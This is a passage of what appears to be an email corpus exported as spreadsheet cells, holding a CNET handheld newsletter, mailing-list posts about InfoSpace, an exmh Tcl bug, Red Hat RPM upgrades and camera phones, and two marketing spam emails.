                 		&lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 						&lt;B&gt;Most Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending June 11&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
               		&lt;/TR&gt;
                     &lt;TR&gt;&lt;TD colSpan=2&gt;
                   		&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     		&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;&lt;/TR&gt;
               		&lt;TR align=middle&gt;&lt;TD height=32 width="6%"&gt;
 						&lt;FONT face="ms sans serif, geneva" size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyp89AjFbT_PUCch20LgRR" &gt;SimCity2000&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcz1l053yXYHRf_uaHkFR" &gt;TV Remote Controller&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH017vSMJkPhB7mxUT9A9R" &gt;GigaBar&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fVmZp6DmLwgkaZmRuR" &gt;ActiveSync&lt;/A&gt;
 						&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                		&lt;/TR&gt;
               		&lt;TR&gt;&lt;TD colSpan=2&gt;
                   		&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     		&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;&lt;/TR&gt;
               		&lt;TR align=middle&gt;&lt;TD height=32&gt;
 						&lt;FONT face="ms sans serif, geneva" size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnucArwBwhq6GOxuYzsR" &gt;Syntact Gamebox (Pocket PC)&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               		&lt;/TR&gt;
               		&lt;TR&gt;&lt;TD colSpan=2&gt;
                   		&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     		&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;&lt;/TR&gt;
 				&lt;/TABLE&gt;
             	&lt;DIV align=left&gt;&lt;FONT face="arial, helvetica" size=-2&gt;&lt;BR&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y5qvA_1xmYgHobjqmZR" &gt;&lt;B&gt;All popular PocketPC downloads&lt;/B&gt;&lt;/A&gt;
 				&lt;/FONT&gt;&lt;BR&gt;&lt;/DIV&gt;
 				&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;!-- /most popular --&gt;
 &lt;!-- reviews &amp; features --&gt;
 &lt;TABLE border=0 cellPadding=10 cellSpacing=0 width=430&gt;
           &lt;TR&gt;
           &lt;TD colspan=2&gt;&lt;FONT face="Arial, Helvetica"&gt;&lt;IMG alt="Reviews and Features"
             height=19 src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" width=200
             NOSEND="1"&gt;&lt;BR&gt;&lt;IMG border=0 height=8 src="http://home.cnet.com/i/nl/rule.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
             &lt;TABLE align=left border=0 cellPadding=0 cellSpacing=0 width=110&gt;
               &lt;TR&gt;&lt;TD&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd819BtQUI3_tvVyn4IcgdR" &gt;
 				&lt;IMG border=0 width="85" height="110" valign="top" src="http://a.r.tv.com/cnet.1d/i/pg/030402palms.jpg" vspace="5"&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 				&lt;!--item 1--&gt;
 							&lt;FONT face="arial, helvetica" size=3&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC3nvGVX4RVXFO5JSrR" &gt;Must-have Palm OS games: Newly updated&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 							&lt;FONT face="arial, helvetica" size=-1&gt;We've listened to reader suggestions, tested the latest games to be released, and now we're ready to present our current list of favorite games for your Palm.
 							&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2FzQq0i6fez6pa6cIJPR" &gt;Read the full story&lt;/a&gt;&lt;!--  &amp;nbsp;|&amp;nbsp;
 							&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6ARP4_RYG8Y0gSPZxnR" &gt;Check latest price&lt;/a&gt; --&gt;
 							&lt;/font&gt;&lt;br clear="all"&gt;&lt;p&gt;
 	&lt;!--item 2--&gt;
 							&lt;FONT face="arial, helvetica" size=3&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDZkIrkUMBXB6W5WWcR" &gt;Toshiba Pocket PC e740&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 							&lt;FONT face="arial, helvetica" size=-1&gt;Powered by Intel's new 400MHz XScale processor and boasting integrated Wi-Fi connectivity, Toshiba's new PDA is an impressive mobile machine. We got hands on with it to test the new chips and its myriad features. See how it did.
 							&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGPTPz2HSCN0U7nQUDRR" &gt;Read the review&lt;/a&gt; &amp;nbsp;|&amp;nbsp;
 							&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTp74yAE64qDAwrPGFR" &gt;Check latest price&lt;/a&gt;
 							&lt;/font&gt;&lt;br clear="all"&gt;
 						&lt;br clear="all"&gt;
 							&lt;div align=left style="padding-top: 20px;"&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDmt64zMKE-nFr99H29R" &gt;
 							&lt;b&gt;More handhelds reviews &amp;amp; features&lt;/a&gt;&lt;/FONT&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- /reviews features --&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
             &lt;!-- picks of the week --&gt; &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dl/sub_palmpk.gif" width=250 height=19 alt="Picks of the Week"&gt;&lt;br&gt;
                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=100%&gt;
 &lt;tr&gt;&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DTu_vJGZP85eXsJh-uR" &gt;Uninstall Hack 1.59&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 									&lt;font size="-2"&gt;File size: 36.6K&lt;br&gt;
 									License: Free to try; $7.00 to buy&lt;br&gt;&lt;/font&gt;
 									Uninstall Hack is designed to help keep your Palm device running smoothly by monitoring application installations and removing all traces of an
 application during the uninstall process. Uninstall Hack also removes
 leftover files from applications removed using the standard Palm OS delete
 tool, leaving your Palm device clean and trouble-free.
 									&lt;br&gt;&lt;br&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeDtOWJ0pvVdi5Z7edsR" &gt;Quik Budget 3.2&lt;/a&gt;&lt;/b&gt;
 									&lt;br&gt;&lt;br&gt;
 									&lt;font size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9TfuhmqiqzUbrvLkiDZR" &gt;
 									&lt;b&gt;All Palm OS editors' picks&lt;/b&gt;&lt;/a&gt;
 									&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;&lt;tr&gt;
 &lt;td&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/hed_picks.gif" width=260 height=19 alt="Picks of the Week"&gt;&lt;/a&gt;&lt;br&gt;
     &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=100%&gt;
 	&lt;td valign=top&gt;
 	&lt;FONT face="arial, helvetica" size=-1&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBhrGBRl28NRQSnqQuR" &gt;PictPocket 2.0&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
     								&lt;font size="-2"&gt;File size: 1.09MB &lt;br&gt;
 									License: Free to try; $16.95 to buy&lt;br&gt;&lt;/font&gt;
 									Take your pictures with you on your Pocket PC. PictPocket allows you to
 view and edit several types of digital image files including MPEG-1 and MPEG-2 video, BMP, 2BP, JPG, JPE, JPEG, GIF, and many more, making this a truly mobile multimedia solution.
 		&lt;br&gt;
                 					&lt;br&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3YttdODFWVhZSgRXBsR" &gt;&lt;b&gt;All Windows CE/PocketPC editors' picks&lt;/b&gt;&lt;/a&gt;
 			  						&lt;/font&gt;&lt;/font&gt;
 			  &lt;!--Horizontal Brick--&gt;
 								&lt;P&gt;
 								&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt;
 								&lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 								&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 									&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     									&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             								&lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jjAFHOOiJGu_NEsnEPR" &gt;Live Tech Help. Submit your question now.&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblYbvLt53xlZk0f-IonR" &gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlsIRmqwuBXvl3NU2rR" &gt;Find a job you love. Over 1 million postings&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPLmZNXReplrQ8kasp4ZR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanykQyy_jvlXdIl9Oi-UidR" &gt;May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV&lt;/A&gt;
 											&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;
 										&lt;/TD&gt;&lt;/TR&gt;
 									&lt;/TBODY&gt;
 								&lt;/TABLE&gt;
 								&lt;/P&gt;
 								&lt;!-- End Horizontal Brick--&gt;
 			  &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;img src="http://a.r.tv.com/cnet.1d/i/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;center&gt;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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dzAPbWk0r9i_f_B0NLncR" &gt;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HREF="http://clickthru.online.com/Click?q=c6-URs9rCLfOFnaxzgMMTVZe8dwuaQ66sRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDuwHAvpmtTwxp6DtFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4KiNL7cn2fqfAgMcXea9R"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href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaK-HsfnODtxI8fiiuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2Ia7htrjQ1U5MauO37xFR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWECxPzgS8IeOdSKzjX19R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB68VKwZ0m-EDvznhjonleR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMGrYJKW24YOLpk6Td6yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbBAcPZV3RXvLF34ULXPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e424&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=85-2G3o-gKNokoqVnwlezVayGtOURRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Naveen Jain steps down
</t>
  </si>
  <si>
    <t xml:space="preserve">From: http://www.xent.com/jan00/0823.html
  &gt; "There are two kinds of people in this world, right? Nonbelievers and
  &gt; believers," the animated Jain said to his audience at the Chase H&amp;Q
  &gt; plaNET.wall.street Internet conference last week. "In other words, those
  &gt; who don't believe in God, and those who believe in God and InfoSpace.
  &gt; That's OK -- the nonbelievers will be converted when we become a
  &gt; trillion-dollar company."
 Chalk one up for the nonbelievers:
 http://www.siliconvalley.com/mld/siliconvalley/3779952.htm
 InfoSpace CEO to step down
 BELLEVUE, Wash. AP) - InfoSpace Inc. chairman and chief executive Naveen 
 Jain will step down from his posts once the Internet services and software 
 company finds a replacement.
 Jain, a former Microsoft executive, founded InfoSpace six years ago and led 
 the company through its rise and fall. His departure from the top posts was 
 announced Wednesday.
 With its stock now trading for dimes, InfoSpace is in danger of being 
 delisted from the Nasdaq Stock Market. The company is asking shareholders 
 to approve a one-for-10 reverse stock split to prop up the price. If 
 approved on Sept. 12, shareholders would trade in 10 shares of stock for 
 one new share.
 The company has had trouble retaining its top-level executives in the past, 
 including most recently, former chief executive Arun Sarin who resigned 
 last year after just nine months on the job.
 The company said Jain will remain as a company employee.
 Shares of InfoSpace fell 2 cents to 43 cents in afternoon trading on Nasdaq.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I may be wrong but I think a single select entry field is used
 for selecting messages and switching folders. Restricting the entries
 to be numeric would break the folder switching functionality, wouldn't
 it?
 My version of MsgChange, not yet updated, has a check
     if {$msgid != {}} {
 	# Allow null msgid from Msg_ShowWhat, which supplies line instead
 	if {$msgid &lt; 0}  return
     } else {
     ...
 at the start of the procedure which takes care of the single '-' case.
 Perhaps the thing to do is for MsgChange to validate a msgid as a
 number before continuing.
 Kevin
 In message &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;, Brent Welch writes:
 &gt; You can also duplicate thiswith
 &gt; 
 &gt; MsgChange - noshow
 &gt; 
 &gt; at the Tcl prompt in the Log window.  I suspect that the sequence
 &gt; parser, which understands things like 5-22 to mean messages 5 through 22
 &gt; is confused when asked to add/remove message "-" from a sequence.
 &gt; 
 &gt; If we are allowed to assume 8.2 or higher, which we can't really, then
 &gt; we could add
 &gt; 
 &gt; if {![string is integer $select(sel)]} {
 &gt;    # bail out of message select mode
 &gt; }
 &gt; to the SelectTypein procedure.
 &gt; 
 &gt; We can probably survive with
 &gt; 
 &gt; if {![regexp {^[0-9]+$} $select(sel)]} {
 &gt;     #bail out of message select mode
 &gt; }
 &gt; 
 &gt; &gt;&gt;&gt;Robert Elz said:
 &gt;  &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500
 &gt;  &gt;     From:        Chris Garrigues &lt;cwg-dated-1030804078.e8b0d5@DeepEddy.Co
 &gt; m&gt;
 &gt;  &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;
 &gt;  &gt; 
 &gt;  &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll
 &gt;  &gt;   | see what I can do about it (or if I can't, I'll hand it off to 
 &gt; Brent).
 &gt;  &gt; 
 &gt;  &gt; Don't worry too much about it, you seem to have plenty of other things
 &gt;  &gt; to do in the immediate future, and this one isn't so critical that people
 &gt;  &gt; can't use the code in normal ways.
 &gt;  &gt; 
 &gt;  &gt; But, to make it happen, type (with normal key bindings) any digit, so the
 &gt;  &gt; code thinks you're trying a message number, then backspace, so the digit
 &gt;  &gt; goes away, then '-' (other junk characters don't seem to have the
 &gt;  &gt; problem, I have just been playing).   That will do it (every time).
 &gt;  &gt; 
 &gt;  &gt; That is: 0 ^h -
 &gt;  &gt; 
 &gt;  &gt; Once you get into that state, the same traceback occurs for every
 &gt;  &gt; character you type, until a message is selected with the mouse.
 &gt;  &gt; 
 &gt;  &gt; This is looking like it might be easy to find and fix, so I'll take a
 &gt;  &gt; look at it later.
 &gt; 
 &gt; 
 &gt; --
 &gt; Brent Welch
 &gt; Software Architect, Panasas Inc
 &gt; Pioneering the World's Most Scalable and Agile Storage Network
 &gt; www.panasas.com
 &gt; welch@panasas.com
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-workers mailing list
 &gt; Exmh-workers@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-workers
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: KVim 6.1.141
</t>
  </si>
  <si>
    <t xml:space="preserve">Any one out their have any RPMs for the new KVim that was just released 
 that'd be suitable for RH7.3?
 The website ( http://freehackers.org/kvim/screenshots.html ) mentions some 
 experimental RPMs for Suse/COnnectiva/Slackware but none for Mandrake...
                                     -- \m/ --
                     ...in 29 days - The Odyssey begins...
                                 www.symphonyx.com
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, you read the links.
 Sorry, but exposing folly is not only humorous but also instructive.  It
 is only by exposing folly to ridicule that you stop it in the first
 place.
 'Brickbats' leans heavily on both, though the item I highlighted was a
 'horror' item not a 'gee that is stupid' item.  For an example of the
 latter, see the city that wanted a woman to pay a ticket for parking in
 an UNmarked no-parking space.
 &gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt; 
 &gt; see my first line: I READ THE LINKS.  brickbats.  idiot.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2 Oct 2002 09:44:15 +0200 (CEST), Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt; wrote:
 &gt; &gt; Matthias Saou (matthias@egwn.net) wrote*:
 &gt; &gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas
 &gt; &gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc
 &gt; &gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
 &gt; &gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-)
     Yeah, I need to work this out, too; I just learned my lesson about living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER ANY CIRCUMSTANCES.  Man, that was annoying.
     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my home directories, music and games on other partitions) and while I have the 8.0 stuff in the list, everything I want to upgrade requires 200+ RPMs.
     I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps core.
     What's the inside secret here, or do I just start searching mirrors for the ISO and get over it?
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 Just machines, to make big decisions- programmed by fellas with
 compassion and vision.  We'll be clean when that work is done;
 Eternally free and eternally young.  Linux.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">thx for the thoughts gentlemen (yes as someone said i use terms loosely) -
 more than cool ---&gt;
 quality: snobs only care about mpixels. this is about communications.  the
 general public cares about speed not quality.  how is akamai doing these
 days? not to mention any other QOS businesses that come to mind.
 implementation: point about hooking to usb, wires, etc. AGREE 100%. these
 implementations are super clunky, attachable camera needs to be integrated a
 la nokia model.  basically useless until better handsets are released i
 think.
 adoption: ian brought up the 'fax' problem.  brilliant thing is, this is far
 more personal than faxes so can be justified more easily and marketed in
 family packs etc. but yes, the usual rules apply as MMS phones have network
 efx.
 content: who cares about content?  that no one can think of 'useful' content
 is always the business persons mistake. the content is the users
 communications.  its anything and everything.  avg person could easily send
 half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 cares if content is trivial in nature. picture speaks a thousand words.
 display: why are dig camera displays better than cell phones?  does anyone
 know who makes these small displays and what the trends are around them?
 misc ramblings: i suppose you skeptical forkers would have said the same
 thing about '1 hour photo' processing.  trivial, who needs it, i get better
 resultion elswhere.  and yet, it had great decentralizing impact - the plant
 had to be downsized and pushed to the retail operation - the digital camera,
 and finally the integrated digital camera phone brings this cycle of
 decentralization in photography to a logical conclusion (which will put the
 photo giants to bed) and change the world in a meaningful way.  also, SMS
 didn't take off because its easy, it took off because it costs less.  its
 greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 traffic over others because of its ratio of cost to bandwidth.  in reality,
 SMS cannibilizes the voice rev's they bought their networks to handle.
 ps:  it is relatively amusing that one 'low resolution' complaint dropped
 just after Joe watched a CARTOON on his television..
 You're right. Or at least, I don't. I saw an advert for it on TV last
 night (can't miss Futurama :-) and I thought, "boy, that's dumb."
 If I wanted to share pictures with someone, I'd email them to them,
 where they could see them on a 1024x or 1600x display, instead of
 rob
 -----Original Message-----
 From: Eugen Leitl [mailto:eugen@leitl.org]
 Sent: Monday, August 19, 2002 1:34 AM
 To: Rob Shavell
 Cc: fork@spamassassin.taint.org
 Subject: Re: sprint delivers the next big thing??
 On Sun, 18 Aug 2002, Rob Shavell wrote:
 &gt; down in the tech world than mobile visual communications.. and yet no one
 &gt; seems to give much of a damn that right now that 2 persons can take photos
 &gt; and share them instantly across space.  this is one of the biggest - and
 The word "trivial" comes to mind.
 &gt; last - fundamental changes in human communications.  will be as big as the
 &gt; browser.
 Remote realtime streaming video is neat, but sharing pictures? You invoke
 big words rather readily.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOK!  Desparately Seeking 100 Lazy People....Who Wants To Make Money
</t>
  </si>
  <si>
    <t xml:space="preserve">This is not spam.  Thanks for posting to our promotional web sites. If you 
 wish to no longer receive email from us at this email address, or if you feel  
 you received this email in error please send an email message to 
 solution244@hotmail.com with "Remove" placed in the subject line
 Dear Friend,
 We are desparately looking for 100 lazy people
 who wish to make lots of money without working.
 We are not looking for people who are self-motivated.
 We are not looking for people who join every 'get rich
 quick' scheme offered on the internet.
 We are not looking for class presidents, beautiful
 people, career builders or even college graduates.
 We don't even want union workers or trade school graduates.
 We want the laziest people that exist - the guys and
 gals who expect to make money without lifting a finger.
 We want the people who stay in bed until noon.
 We want those of you who think that getting out of bed to go
 lay on the couch is an effort that is best not thought about.
 If you meet this criteria, go to this site and join free:
 http://www.roibot.com/w.cgi?R64190_funprogram
 In case you haven't figured it out yet, we want
 the kind of people who DO NOT take risks.
 If you are the kind of person who will consider doing
 something that's NOT a 'sure thing', then do NOT respond.
 This is too easy a way to make money
 and there's no challenge in it.
 If you can get to the website, you will be able to see the first home 
 business in history that requires no work.  NONE.
 By clicking on this link and going to
 this website, you will be aknowledging the fact that you
 want to make enough money that you can quit
 your regular job and sleep all day.
 We are not looking for a commitment from you
 and we don't even want your money.
 As a matter of fact, we don't even want you
 to hear from us again if the idea of making lots
 of money without working does not interest you.
 So if nothing else, remember this -
 to make money without working for it just
 "Join Free".  Simple as that.
 http://www.roibot.com/w.cgi?R64190_funprogram 
 We look forward to hearing from you.
 In all seriousness,
 This is NOT a "no work" program that will make you money without lifting 
 a finger. 
 Advertising effectively requires WORK and plenty of it. Oh, for sure, it's 
 not like picking cotton under a broiling sun, but it IS work, nonetheless. 
 And we DO want peoples' money ONLY when they see the value of our 
 products, services and upgrades. 
 We look forward to hearing from you. 
 Cordially your lazy friend, 
 Theresa Brown
 We have 10 EXTREMELY TARGETED SAFE-LISTS for you to use daily 
 in your advertising campaign! This is spam-free, worry-free advertising at 
 its best!
 http://www.roibot.com/w.cgi?R64190_safelist
 Get Your Promotion To Prosperity &amp; Peace
 Sow A Seed And GOD Will Meet Your Need!
 Give To Your Local Charitable Organization
 Life In The Word
 WWW.JOYCEMEYER.ORG
 Success Begins In The MIND! 
 ***MAKE IT A GREAT DAY*** 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: An Innovative Plan for Today's Market
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_18E22D_01C238B0.6EDF1B30
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  First Year Bonus - 10% Commissions!
  Guaranteed Return of Premium=09
  	 Convert Tax Deferred to Tax Free Benefits=0A=
 Access to death
 benefit for LTC benefits=0A=
 72 Hour Approval (in most cases)=0A=
 Free E&amp;O
 Coverage=09
 =20
  An Innovative Plan Designed for Today's Market=09
   _____ =20
 Give your clients what they want and need: Guaranteed Death Benefits and
 Long Term Care Benefits without expensive AND continuous Long Term Care
 Premiums.
 =20
  ? Lifetime Guarantees
 ? Return of Premium Guarantees for single pay plans
 ? Convert Tax Deferred to Tax Free Benefits (for your clients' heirs).
 Simplified Underwriting - Non-medical, no blood, no urine, no ekg. Have
 your clients complete a 6 question application, fax to underwriting and
 generally within 72 hours you will have status.
   _____ =20
 Call or e-mail &lt;mailto:marketing@nationalfinancialgroup.com&gt;  us Today!
  800-833-7427
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 National Financial Group &lt;http://www.nationalfinancialgroup.com&gt;=20
 The Future Series Convention March 2003.
 Join us in Maui during PRIME SEASON - An experience you will never
 forget!
 *Up to $500,000 maximum; $25,000 must remain in policy after this
 benefit is exercised. **10% commission on single pay plan ages 45 - 80.
 ***Single Pay Plans Only. Product and certain features not available in
 all states. The Future Protector Series (policy form ISWL-1, ISWL-5,
